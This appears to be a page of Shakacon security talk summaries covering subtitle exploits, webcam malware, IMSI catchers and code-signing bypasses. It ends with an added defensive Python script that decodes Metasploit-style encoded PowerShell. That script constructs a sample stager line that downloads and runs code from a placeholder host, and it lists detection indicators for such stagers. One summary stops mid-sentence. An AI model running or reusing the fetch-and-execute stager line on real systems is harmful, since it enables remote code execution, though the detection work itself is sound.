The document summarizes a presentation about exploiting a vulnerability in Apple's code signing process on macOS. The vulnerability allows ad-hoc signed malicious code to bypass Gatekeeper and execute on systems where only Apple-signed code is supposed to run. The presentation covered code signing basics, a demonstration of the vulnerability, technical details, how it impacts third-party software vendors, the disclosure process to Apple, and recommendations for properly validating signed code.
Cloud Forensics: Putting the Bits Back Together (Shakacon)
The document discusses forensic investigations of AWS EC2 instances and EBS volumes. It details the process the author took to launch EC2 instances with different EBS volume types, write and delete files, snapshot the volumes, and use forensic software to recover deleted files from the snapshots. The results showed that standard, gp2 and io1 volume types had the highest recovery rates of deleted files from snapshots, while sc1 and st1 volume types recovered fewer files and in some cases produced anomalously large PDF files. Maintaining chain of custody of forensic evidence and using separate AWS accounts was recommended to safeguard recovered data.
Pwned in Translation - from Subtitles to RCE (Shakacon)
What if I told you that when you're watching a movie on your PC or streamer, someone might also be watching you. And he might be doing so using subtitles.
Yes, subtitles, those innocent looking text lines at the bottom of your screen. Millions of people use them without a second thought – never wondering where they come from, where they're parsed or how they are rendered. You might be surprised to find that there are actually more than 25 subtitle formats out there, most of which support exotic features such as HTML tags, raw images or even freeform binary (What?). Moreover, there is no standard library designed to parse subtitles, which leaves this task to be independently implemented by the various media players. What can go wrong?
Well, basically - everything.
This presentation will show, for the first-ever time on stage, the disastrous potential of subtitles as an attack vector. We will explain and demo the numerous vulnerabilities we found involving subtitles. There will be unsanitized JavaScript running on native web applications; file systems being manipulated; heaps being corrupted; and full RCE on the most common streaming platforms including VLC, Kodi (XBMC) and PopcornTime. It really seems there is no limit to what can be done using those little helpful text files.
But perhaps the best thing about this attack vector is that in some of these media players, subtitles are automatically downloaded, requiring no user interaction. These subtitles are commonly downloaded from shared online repositories (such as OpenSubtitles) where they are indexed and ranked. In order to make sure our crafted malicious subtitles would be the ones downloaded by the video player, we had to manipulate the website ranking algorithm. So, we did that as well - Look ma, no MITM.
Since we showed that full control over the entire subtitles chain is possible, an attacker using this technique can also choose to narrow his target audience based on the subtitle language and specific movies, or simply spray his exploits in all directions, which leaves millions of people exposed to this new infection method.
One of the most insidious actions of malware is abusing the video and audio capabilities of an infected host to record an unknowing user. Macs of course, are not immune; malware such as OSX/Eleanor, OSX/Crisis, and others, all attempt to spy on OS X users.
And as was recently shown by the author, more advanced malware could piggyback into legitimate webcam sessions in order to covertly record the local user. As there are no visible indications of this malicious activity (as the LED light is already on), the malware can record both audio and video without fear of detection.
After examining various ‘webcam-aware’ OS X malware samples and describing the technical details of the piggyback attack, the talk will dive into OverSight.
OverSight is a free tool that implements various novel protection mechanisms in order to alert Mac users of any code that attempts to access the mic or webcam (even via the stealthy piggyback attack). We’ll dive into the design and technical details of the tool, describing various components for the first time.
Following this, we’ll look at an interesting case study, where OverSight discovered that a popular mac application was continuing to record, even when the user turned it off. Yikes! Finally, the talk will conclude by discussing future trends of both webcam/mic aware macOS malware and defensive detection methodologies. With such insights, we’ll strive to keep macOS users protected and secure!
Modern Reconnaissance Phase on APT - protection layer (Shakacon)
The document discusses 5 case studies of modern reconnaissance techniques used by advanced persistent threat (APT) actors. Each case study examines a different infection vector involving documents with embedded objects that first perform reconnaissance on the target system before deciding whether to deploy a final payload. The case studies demonstrate evolving tactics to avoid exposing valuable code and thwart analysis.
A Decompiler for Blockchain-Based Smart Contracts Bytecode (Shakacon)
The document discusses decompiling Ethereum smart contracts. It describes how smart contracts written in Solidity are compiled to Ethereum Virtual Machine (EVM) bytecode that is stored on the blockchain. The bytecode contains a dispatcher that uses the first 4 bytes of the call data, representing the function hash, to determine which function to execute. Function parameters and local variables are accessed using EVM instructions like CALLDATALOAD and stored in memory and on the stack.
Dock ir incident response in a containerized, immutable, continually deploy... (Shakacon)
This document discusses incident response strategies in a containerized and immutable infrastructure environment like Docker. It addresses challenges like lack of system and software inventory visibility due to rapid container changes, and lack of agent-based security due to single-purpose containers. It proposes solutions like establishing managed base container OSs, whitelisting allowed containers and files, and leveraging logs and sidecar containers to monitor for detections. Response challenges around long investigation timeframes due to short container lifetimes and lack of access are addressed with strategies like comprehensive logging, filesystem artifact preservation, and automating remote response capabilities.
Reviewing the Security of ASoC Drivers in Android Kernel (Shakacon)
The ALSA System on Chip (ASoC) provides a common architecture for chip vendors to develop drivers for their sound SoCs and codecs. It is also the core management of sound drivers in the Android kernel. Compared with the well-known libstagefright library, the ASoC driver works in kernel space and talks to upper-level media libraries through the HAL; thus it plays a much more important role: it is the real heart of the whole Android media service.
However, few vulnerabilities had been disclosed in this part of Android before our research (starting from the middle of 2016). There are multiple reasons: the ALSA project has an almost twenty-year history and most bugs may have been killed in the past few years in the main Linux kernel; developers have become more and more familiar with the project, so it is not easy to introduce a bunch of new bugs; the standard of coding style, testing flow and code review processes guaranteed the quality, and this is often what open source projects benefit from.
But what if this old project meets the much younger Android OS? The situation was really beyond my expectations. With a total review of the ASoC implementation, combined with effective fuzzing tools, I was able to disclose dozens of bugs in Android ASoC drivers. These bugs include normal OOBs, stack overflows, heap overflows, race conditions and use-after-free/double-frees. What is more interesting is that these bugs were introduced from several different channels: chip vendors, device manufacturers, and the ALSA project maintainers.
This proves to me that the ASoC driver in the Android kernel is a completely vulnerable but overlooked attack surface.
Silent Protest: A Wearable Protest Network (Shakacon)
Independent observers are noting a decrease in freedom of speech worldwide. In its 2016 report, Reporters Without Borders unveils a "climate of fear and tension combined with increasing control over newsrooms by governments and private-sector interests", while Amnesty International's report on the State of the World's Human Rights states that “2016 was the year when the cynical use of ‘us vs them’ narratives of blame, hate and fear took on a global prominence to a level not seen since the 1930s. Too many politicians are answering legitimate economic and security fears with a poisonous and divisive manipulation of identity politics in an attempt to win votes”.
At the same time, the United Nations Statistics Division insists on the unprecedented literacy rate achieved by mankind globally. Human beings have more and more things to say.
With this project, we present ProtestWear: a wearable DIY protest network built from inexpensive network gear and open source software. Its goal is to facilitate freedom of speech, enable art sharing in countries where this human right is being challenged by authorities, and offer a customizable portable Anonymous Protest Network platform reliable and affordable enough to be built in third world countries and developed countries alike.
We introduce a new type of IMSI catcher which operates over WiFi. Whilst existing Stingray-type IMSI catchers exploit 24G radio protocols to track movements of mobile subscribers, in this talk we introduce two new approaches to track mobile devices which exploit authentication protocols that operate over WiFi. These protocols are now widely implemented in most modern mobile OSes, allowing for the creation of a low cost (<$25) IMSI catcher.
We demonstrate how users may be tracked on a range of smartphones and tablets including those running iOS, Android and other mobile OSs. This tracking can be performed silently and automatically without any interaction from the tracked user. We have developed a proof of concept system that demonstrates our IMSI catcher employing passive and active techniques.
Finally, we present guidelines for vendors and cellular network operators to mitigate the user privacy issues that arise.
The document discusses various malware techniques, including:
1) Devolving malware discusses getting unauthorized access to systems through social engineering and exploiting software vulnerabilities to gain shell access or sensitive files.
2) Password protected documents and embedded macros aim to trick users into enabling malicious macros that download and execute additional payloads like VBS scripts.
3) Several malware samples are described that use techniques like delayed execution, encoded payloads, and displaying decoy documents to evade detection in sandboxes and steal sensitive information from victims.
4) The document advocates copying code from other malware projects instead of writing original malware due to the time and effort required. User targeting, anti-sandbox tricks, and packers are also
Programmers naturally assume that different programs require different code. Minesweeper is not the same as AES, Windows is not the same as Linux, and Notepad is not the same as malware. But what if this were not the case? We'll walk through how we can convert all programs into the exact same code - allowing the CPU to execute the same sequence of instructions, to run any possible application. By fundamentally changing our ideas about what it means to "compute", we'll outline the unsettling implications for malware detection, and open some fascinating new doors in exploitation.
This presentation will sum up how to do tunnelling with different protocols and will detail different perspectives. For example, companies are fighting hard to block exfiltration from their network: they use http(s) proxies, DLP, IPS technologies to protect their data, but are they protected against tunnelling? There are so many interesting questions to answer for users, abusers, companies and malware researchers. Mitigation and bypass techniques will be shown to you during this presentation, which can be used to filter any tunnelling on your network or to bypass misconfigured filters.
Windows Systems & Code Signing Protection by Paul Rascagneres (Shakacon)
This presentation explains the code signing mechanism (authenticode) developed by Microsoft on Windows systems. The presentation will first explain the kernel implication and the impact on driver development. This protection firstly annoyed rootkit developers but they found several ways to bypass it. Well-known rootkits such as Derusbi, Uroburos or GrayFish use tricks to bypass driver signature. These techniques will be described during the presentation. Finally, the user-land will be discussed with the new library injection protection based on code signing implemented in Windows 10 TH2 and especially for the Edge process.
When Encryption is Not Enough... by Sumanth Naropanth, Chandra Prakash Gopalaiah ... (Shakacon)
Communication protocols are core to computing devices. They have evolved from the traditional Serial and LAN ports to complex (and lightweight) protocols of today, such as Bluetooth Low Energy (BLE), ANT+, ZigBee, etc.
Bluetooth Low Energy (BLE) is a popular protocol of choice for low energy, low performance computing systems. While versions of the BLE specification prior to 4.2 allowed simple key mechanisms to encrypt the communication between connected nodes, the more recent specification of BLE (4.2) provides better channel encryption via the Secure Simple Pairing (SSP) mode to protect data against snooping and man-in-the-middle style attacks. These protocols are used extensively by wearables such as smart watches and activity trackers.
Most wearables work in conjunction with a companion mobile application running on a platform that supports BLE with the aforementioned security mechanisms. We looked at Android and iOS for our study. We observe that there are fundamental assumptions (leading security limitations) in the adoption of the BLE security specifications on these two platforms. Relying on the standard BLE APIs for Android and iOS may be insufficient and may even project a false sense of security. It is critical to understand the degree of security that the BLE specifications can offer, and clearly separate that from the developers’ responsibility to design application level security in order to assure confidentiality and integrity of data being transmitted between a wearable device and its companion application.
The Search for the Perfect Door - Deviant Ollam (Shakacon)
You have spent lots of money on a high-grade, pick-resistant, ANSI-rated lock for your door. Your vendor has assured you how it will resist attack and how difficult it would be for someone to copy your key. Maybe they’re right. But… the bulk of attacks that both penetration testers and also criminals attempt against doors have little or nothing to do with the lock itself! This talk will be a hard-hitting exploration (full of photo and video examples) of the ways in which your door — the most fundamental part of your physical security — can possibly be thwarted by someone attempting illicit entry. The scary problems will be immediately followed by simple solutions that are instantly implementable and usually very within-budget. You, too, can have a near-perfect door… if you’re willing to learn and understand the problems that all doors tend to have.
At WWDC 2014, Apple introduced Swift, their revolutionary new programming language for the future. Swift promises unapologetic optimization, outstanding speed, and best-in-class language features. Swift is sleek, stunning, and already the most loved language on StackOverflow. Up until now, no reverse engineer has dissected the language or the artifacts it produces and presented their findings. However, since an hour long presentation discussing Swift class structure and string layouts would be painfully boring, this talk actually presents a systematic approach to binary reverse engineering new foreign ABIs using Swift as a case study. I’ll present approaches for identifying control structures and flow, recovering class layouts, mapping machine code patterns to higher level language constructs, and more!
This presentation will leave you with the knowledge and confidence needed to take on any ABIs – maybe even Haskell.
Making a Scalable Automated Hacking System by Artem Dinaburg (Shakacon)
In this presentation, I’ll tell the story of our Cyber Grand Challenge adventure, explain how to automatically find and patch bugs in binary code, and discuss what’s next for our bug finding system.
The story will describe how our small team of internationally distributed engineers made an automated bug finding system that placed 2nd in vulnerability discovery. I will cover both the fun parts and the necessary-but-boring-parts of automated bug finding. Fun parts include combining existing fuzzing and symbolic execution tools into one coherent system, and making fuzzing fast by identifying and eliminating performance bottlenecks. The necessary-but-boring-parts include automated testing, deployment, and configuration management, otherwise known as devops.
Second, I’ll talk about how to patch bugs by translating binaries to LLVM bitcode, patching the bitcode, and re-emitting working patched binaries. I will cover different patching strategies and the requirements for each approach. I will also discuss instrumentation techniques, transformation operations, and analysis passes that are enabled by LLVM translation.
Finally, I will talk about how researchers should fundamentally change the way bug finding tools are developed. Currently each tool is its own discrete island. However, there are quantifiable benefits to be gained by applying the Unix philosophy of discrete, communicating tools to the problem of bug finding.
Easy slide to breeze past on: the client contacts us with an alert, we immediately recognize it as a classic Metasploit PowerShell payload, and it is pretty likely this is bad news.
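Recognizing that payload on sight comes with experience; the added example below (not from the Mandiant deck) shows what the responder is mentally doing. It peels the -EncodedCommand layer (base64 of UTF-16LE), then the nested FromBase64String plus GzipStream layer that msfvenom's PowerShell stagers use, and lists the stager indicators, stealth flags and URLs it finds. The indicator and flag lists are illustrative assumptions, the sample command line is constructed rather than captured from any case, and 192.0.2.10 is a documentation address.

```python
"""Decode and triage an encoded PowerShell command line of the classic Metasploit shape (added example)."""
import base64
import binascii
import gzip
import re
import zlib

# Strings that recur in Metasploit/msfvenom PowerShell stagers; assumption: illustrative, not exhaustive.
INDICATORS = [
    "Invoke-Expression", "IEX", "New-Object Net.WebClient", "DownloadString",
    "FromBase64String", "IO.Compression.GzipStream", "VirtualAlloc",
    "Net.Sockets.TCPClient",
]
STEALTH_FLAGS = ("-nop", "-noni", "-w hidden", "-ep bypass", "-exec bypass")
URL_RE = re.compile(r"https?://[^\s'\"()]+")
B64_BLOB_RE = re.compile(r"FromBase64String\(['\"]([A-Za-z0-9+/=]+)['\"]\)")


def extract_encoded_command(cmdline: str):
    """Return the argument after -e/-enc/-EncodedCommand (prefix-matched like powershell.exe), or None."""
    args = cmdline.split()
    for i, arg in enumerate(args[:-1]):
        if arg[:1] in "-/":
            name = arg[1:].lower()
            if name and "encodedcommand".startswith(name):
                return args[i + 1]
    return None


def decode_layers(cmdline: str) -> list:
    """Peel the UTF-16LE base64 layer, then a FromBase64String+GzipStream layer if one is present."""
    layers = []
    enc = extract_encoded_command(cmdline)
    if enc is None:
        return layers
    try:
        script = base64.b64decode(enc).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return layers
    layers.append(script)
    m = B64_BLOB_RE.search(script)
    if m and "GzipStream" in script:
        try:
            inner = gzip.decompress(base64.b64decode(m.group(1))).decode("utf-8", "replace")
            layers.append(inner)
        except (binascii.Error, OSError, EOFError, zlib.error):
            pass  # blob was not a gzip stream; keep what we have
    return layers


def triage(cmdline: str) -> dict:
    """Summarize what the command line would execute, across every decoded layer."""
    layers = decode_layers(cmdline)
    blob = "\n".join([cmdline] + layers)
    low = blob.lower()
    indicators = [ind for ind in INDICATORS if ind.lower() in low]
    flags = [f for f in STEALTH_FLAGS if f in cmdline.lower()]
    urls = sorted(set(URL_RE.findall(blob)))
    return {
        "encoded": bool(layers),
        "layers": layers,
        "indicators": indicators,
        "stealth_flags": flags,
        "urls": urls,
        "verdict": bool(layers) and (len(indicators) >= 2 or bool(urls)),
    }


def build_sample_stager() -> str:
    """Construct a command line shaped like a Metasploit web_delivery stager (constructed, not captured)."""
    inner = "IEX ((New-Object Net.WebClient).DownloadString('http://192.0.2.10:8080/a'))"
    gz_b64 = base64.b64encode(gzip.compress(inner.encode())).decode()
    outer = (
        '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("%s"));'
        "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,"
        "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();" % gz_b64
    )
    enc = base64.b64encode(outer.encode("utf-16-le")).decode()
    return "powershell.exe -nop -w hidden -e " + enc


if __name__ == "__main__":
    result = triage(build_sample_stager())
    for key in ("encoded", "indicators", "stealth_flags", "urls", "verdict"):
        print(key, result[key])
    for n, layer in enumerate(result["layers"], 1):
        print(f"layer {n}: {layer[:80]}")
```

The URL only becomes visible in the innermost layer, which is why a detection that greps the raw command line for "DownloadString" misses this shape; decode first, then match.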